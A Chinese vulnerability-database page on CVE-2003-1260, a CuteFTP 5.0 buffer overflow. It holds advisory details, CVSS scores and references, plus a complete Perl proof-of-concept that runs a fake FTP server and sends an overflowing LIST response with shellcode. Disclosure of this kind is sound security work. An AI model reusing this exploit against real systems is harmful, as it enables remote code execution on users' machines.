CVE-2003-1260
CVSS7.6
发布时间 :2003-12-31 00:00:00
修订时间 :2008-09-05 16:36:28
NMCOE    

[原文]Buffer overflow in CuteFTP 5.0 allows remote attackers to execute arbitrary code via a long response to a LIST command.


[CNNVD]GlobalScape CuteFTP LIST应答缓冲区溢出漏洞(CNNVD-200312-447)

        
        CuteFTP是一款基于Windows操作系统的文件传输协议客户端。
        CuteFTP对服务器传递的超长LIST命令应答缺少正确处理,远程攻击者可以利用这个漏洞伪造服务器"LIST"应答,触发缓冲区溢出,可能以CuteFTP进程权限在系统上执行任意指令。
        当CuteFTP连接到FTP服务器后,如果FTP服务器应答"LIST"命令时,发送超过257字节的数据,就可以导致CuteFTP产生缓冲区溢出,精心提交应答数据,可以覆盖EIP寄存器,可能以CuteFTP进程权限在系统上执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 7.6 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: HIGH [漏洞利用存在特定的访问条件]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1260
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-1260
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200312-447
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/archive/1/325659
(PATCH)  BUGTRAQ  20030618 Re: CuteFTP 5.0 XP, Buffer Overflow
http://www.securityfocus.com/bid/6642
(UNKNOWN)  BID  6642
http://www.iss.net/security_center/static/11093.php
(UNKNOWN)  XF  cuteftp-list-command-bo(11093)
http://archives.neohapsis.com/archives/bugtraq/2003-01/0123.html
(UNKNOWN)  BUGTRAQ  20030118 CuteFTP 5.0 XP, Buffer Overflow
http://www.osvdb.org/2181
(UNKNOWN)  OSVDB  2181
http://secunia.com/advisories/7898
(UNKNOWN)  SECUNIA  7898
http://seclists.org/lists/fulldisclosure/2003/Jan/0126.html
(UNKNOWN)  FULLDISC  20030107 CuteFTP 5.0 XP, Buffer Overflow
http://archives.neohapsis.com/archives/bugtraq/2003-02/0087.html
(UNKNOWN)  BUGTRAQ  20030205 Re: CuteFTP 5.0 XP, Buffer Overflow

- 漏洞信息

GlobalScape CuteFTP LIST应答缓冲区溢出漏洞
高危 边界条件错误
2003-12-31 00:00:00 2007-06-19 00:00:00
远程  
        
        CuteFTP是一款基于Windows操作系统的文件传输协议客户端。
        CuteFTP对服务器传递的超长LIST命令应答缺少正确处理,远程攻击者可以利用这个漏洞伪造服务器"LIST"应答,触发缓冲区溢出,可能以CuteFTP进程权限在系统上执行任意指令。
        当CuteFTP连接到FTP服务器后,如果FTP服务器应答"LIST"命令时,发送超过257字节的数据,就可以导致CuteFTP产生缓冲区溢出,精心提交应答数据,可以覆盖EIP寄存器,可能以CuteFTP进程权限在系统上执行任意指令。
        

- 公告与补丁

        厂商补丁:
        globalSCAPE
        -----------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.globalscape.com

- 漏洞信息 (22184)

GlobalScape CuteFTP 5.0 LIST Response Buffer Overflow Vulnerability (EDBID:22184)
windows remote
2003-03-26 Verified
0 snooq
N/A [点击下载]
source: http://www.securityfocus.com/bid/6642/info

A buffer overflow condition has been reported for the CuteFTP application. The vulnerability is due to insufficient bounds checking performed on certain FTP command responses. 

If CuteFTP is used to connect to a malicious FTP server that sends an overly long response to the LIST command, the buffer overflow condition will be triggered. Code execution may be possible.

** CuteFTP 5.0 build 51.1.23.1 was reported to still be vulnerable to this issue. For this build, 780 bytes of data are required to overflow the buffer rather than 257 bytes.

#!/usr/bin/perl
#
#  Date: 26/03/2003
#  Author: snooq [http://www.angelfire.com/linux/snooq/]
#
#  Basically, this is a fake ftpd that will send out 'overly long' 
#  LIST response to overflow the CuteFTP 5.0 XP client.
#
#  For more info on the bug, read these:
#
#  -> http://www.securityfocus.com/archive/1/307160/2003-02-05/2003-02-11/2
#  -> http://www.securiteam.com/windowsntfocus/5PP0P0U8UU.html
#
#  Notes:
#  ======
#  1. Server's 227 response are hardcoded. (ie IP and data port)
#  2. Payload is harmless 'notepad.exe'.
#
#  Flame or comment, goes to jinyean_at_hotmail_dot_com

use Socket;
use FileHandle;

my $port=21;
my $data_port=24876;			# 97, 44
my $ret="\xa1\xeb\xe9\x77";		# 0x77e9eba1, CALL ESP, Win2K, kernel32.dll 5.0.2195.1600 
my $shellcode="\x55"			# push ebp 
	     ."\x8b\xec"		# mov ebp, esp 
	     ."\xb8\x0e\xb5\xe9\x77"	# mov eax, 0x77e9b50e -> WinExec()  
	     ."\x33\xf6"		# xor esi, esi
	     ."\x56"			# push esi
	     ."\x68\x2e\x65\x78\x65"	# push 'exe.'
	     ."\x68\x65\x70\x61\x64"	# push 'dape'
	     ."\x68\x90\x6e\x6f\x74"	# push 'ton'
	     ."\x8d\x7d\xf1"		# lea edi, [ebp-0xf]	
	     ."\x57"			# push edi		
	     ."\xff\xd0"		# call eax
	    #."\xcc";			# int 3 -> breakpoint, for debugging
	     ."\x55"			# push ebp 
	     ."\x8b\xec"		# mov ebp, esp 
	     ."\x33\xf6"		# xor esi, esi
	     ."\x56"			# push esi
	     ."\xb8\x2d\xf3\xe8\x77"	# mov eax, 0x77e8f32d -> ExitProcess()  
	     ."\xff\xd0";		# call eax
	
for ($i=0;$i<256;$i++) { 	
	$pad1.="A";
}
for ($i=0;$i<133;$i++) { 	
	$pad2.=$ret;
}
for ($i=0;$i<(100-length($shellcode));$i++) { 	
	$pad3.="\x90";
}
for ($i=0;$i<900;$i++) { 	
	$pad4.="\x90";
}

$buff=$pad1.$pad2.$pad3.$shellcode.$pad4;

socket(SOCKET1,PF_INET,SOCK_STREAM,(getprotobyname('tcp'))[2]);
bind(SOCKET1,pack('Sna4x8',AF_INET,$port,"\0\0\0\0")) || die "Can't bind to port $port: $!\n";
listen(SOCKET1,5);

socket(SOCKET2,PF_INET,SOCK_STREAM,(getprotobyname('tcp'))[2]);
bind(SOCKET2,pack('Sna4x8',AF_INET,$data_port,"\0\0\0\0")) || die "Can't bind to port $data_port: $!\n";
listen(SOCKET2,5);

NEW_SOCKET1->autoflush();
SOCKET1->autoflush();

NEW_SOCKET2->autoflush();
SOCKET2->autoflush();

while(1){
	accept(NEW_SOCKET1,SOCKET1);
	print NEW_SOCKET1 "220 Welcome to EvilFTPd 1.0\r\n";
	while(<NEW_SOCKET1>) {
		chomp;
		if (/USER/i) {
			print NEW_SOCKET1 "331 OK\r\n";
		}
		elsif (/PASS/i) {
			print NEW_SOCKET1 "230 OK\r\n";
		}
		elsif (/PASV/i) {
			print NEW_SOCKET1 "227 Entering Passive Mode (192,168,8,8,97,44)\r\n";
		}
		elsif (/LIST/i) {
			if (!($pid=fork)) {	# fork a child to handle data connection
				while(1) {
					accept(NEW_SOCKET2,SOCKET2);
					print NEW_SOCKET2 "$buff";
				}
			}
			else {
				print NEW_SOCKET1 "150 OK\r\n";
				print NEW_SOCKET1 "226 OK\r\n";	
			}
		}
		else {
			print NEW_SOCKET1 "200 OK\r\n";
		}
	}
}		

- 漏洞信息

2181
CuteFTP LIST Command Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity

- 漏洞描述

GlobalSCAPE CuteFTP versions up to 5.0.2 contain a flaw that allows a remote buffer overflow. The FTP client fails to check the size of the response from the LIST command before placing it into the buffer, resulting in a stack overflow. This could allow arbitrary code to be executed on the remote victims machine.

- 时间线

2003-01-18 2002-09-04
Unknow Unknow

- 解决方案

The vendor has released version 5.0.2 of CuteFTP XP that is reported to fix the stack overflow vulnerability. Versions 5.0.1, 5.0 or earlier should be uninstalled and version 5.0.2 be installed.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站